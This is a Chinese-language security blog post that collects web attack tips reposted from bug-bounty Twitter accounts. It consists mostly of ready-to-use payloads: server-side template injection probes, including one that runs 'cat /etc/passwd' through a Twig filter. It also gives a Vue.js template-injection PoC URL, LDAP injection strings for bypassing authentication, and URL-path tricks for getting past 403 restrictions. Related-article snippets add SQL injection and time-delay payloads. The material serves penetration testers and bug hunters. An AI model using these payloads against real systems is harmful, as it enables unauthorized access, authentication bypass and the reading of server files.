Twitter渗透技巧搬运工（二）

VSole2022-06-05 04:50:20

SSTI payloads

{2*2}[[7*7]]
{{7*7}}
{{7*'7'}}
<%= 7 * 7 %>
{{ request }}
{{self}}
{{dump(app)}}
#{3*3}
#{ 3 * 3 }
{{ ''.__class__.__mro__[2].__subclasses__() }}
{{['cat%20/etc/passwd']|filter('system')}}

原文地址：https://twitter.com/_bughunter/status/1522619419024887809?s=20&t=zoXT_4ZQw1vSYFjj1Lg_vA

Vue.js Javascript 库客户端模板注入

[PoC]

hxxp://host/?name={{this.constructor.constructor('alert("foo")')()}}

原文地址：https://twitter.com/wugeej/status/1354312840681668610?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

bypass OTP二次验证技巧

原文地址：https://twitter.com/nxtexploit/status/1524601440635060225?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

bypassing endpoints

原文地址：https://twitter.com/beginnbounty/status/1520420265087610880?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

LDAP injection auth bypasses:)

1. *
2. *)(&
3. *)(|(&
4. pwd)
5. *)(|(*
6. *))%00
7. admin)(&)

原文地址：https://twitter.com/ManasH4rsh/status/1520653543119593472?s=20&t=0hdMZw-sjWsIgybZ0wY4XA

403 Forbidden bypass

GET /admin ==> 403 Forbidden
GET /blablabal/%2e%2e/admin ==> 200 OK
GET /blablabal/..;/admin ==> 200 OK 
GET /blablabal/;/admin ==> 200 OK
GET /blablabal/admin/..;/ ==> 200 OK
GET /admin?access=1 ==> 200 OK

原文地址：https://twitter.com/_bughunter/status/1525874647652237312?s=20&t=3pL0jy_ZrHfU_Wl055b7vg

httpstwitter

本作品采用《CC 协议》，转载必须注明作者和本文链接

干货 | Twitter渗透技巧搬运工

2022-08-16 06:46:31

快速检测有无SQL注入' OR 1=1--. 获取凭证访问密钥?将标头更改为这样并观察响应

Twitter渗透技巧搬运工（二）

2022-06-05 04:50:20

{2*2}[[7*7]] {{7*7}} {{7*'7'}} <%= 7 * 7 %> {{ request }} {{self}} {{dump(app)}} #{3*3} #{ 3 * 3 } {{ ''.__class__.__mro__[2].__subclasses__() }} {{['cat%20/etc/passwd']|filter('system')}}

Twitter渗透技巧搬运工

2022-05-18 07:38:15

Twitter渗透技巧搬运工

Twitter渗透技巧搬运工（一）

2022-05-13 07:19:14

' OR 1=1-- ' OR 1=0-- %27%20or%201=1 *(|(object=*)) )%20or%20('x'='x %20or%201=1 1) or pg_sleep(__TIME__)-- /**/or/**/1/**/=1 ' or username like '% );waitfor delay '0:0:__TIME__'-- or isNULL(1/0) /* x

Twitter认证账户被黑，并发送钓鱼信息

2022-07-04 22:17:38

威胁行为者正在入侵经过验证的 Twitter 帐户，以发送虚假但编写良好的暂停消息，试图窃取其他经过验证的用户的凭据。

提供一个0day(CVE)挖掘思路（可能）

2021-09-02 19:32:02

最近在Twitter看到国外黑阔jonhat披露的雷蛇的0day漏洞，该漏洞只要接入雷蛇的鼠标或键盘等外设安装驱动就能直接提权到system权限，快来了解一下吧

干货 | 域渗透之域持久性：Shadow Credentials

2022-05-06 08:30:13

属性，以获得用于检索 NTLM 哈希值和请求 TGT 票据。PKINIT 是 Kerberos 协议的扩展协议，允许在身份验证阶段使用数字证书。KDC 拥有客户端密钥的副本，并且可以解密预身份验证的数据以对客户端进行认证。

$8000赏金奖励：Opera浏览器从XSS 到 RCE

2022-01-18 14:28:25

从XSS到RCE，终获8000美刀奖励～

俄罗斯铁路网站被乌克兰黑客关闭

2023-07-24 09:54:43

俄罗斯国有铁路公司RZD周三表示（https://t.me/telerzd/3338），由于“大规模”网络攻击，其网站和移动应用程序关闭了几个小时，迫使乘客只能在火车站购买车票。乌克兰黑客组织IT Army（https://t.me/c/1764189517/294560）在其Telegram频道上声称对此次攻击负责。“我们的目标不是永久关闭该网站。准备对此类目标的攻击需要付出巨大的努力，“IT

CVE-2021-35052：WinRAR远程代码执行漏洞分析

2021-11-04 10:56:15

WinRAR是一款功能强大的压缩包管理工具，广泛应用于Windows系统的RAR、ZIP等类型的压缩文件的创建与解压中。2021年10月20日，Positive Technologies公司的Psych0tr1a(https://twitter.com/Psych0tr1a)公开披露WinRAR 5.70试用版及以前版本存在远程代码执行漏洞，此漏洞允许攻击者拦截和修改发送给用户的请求，以达到执行远

VSole

网络安全专家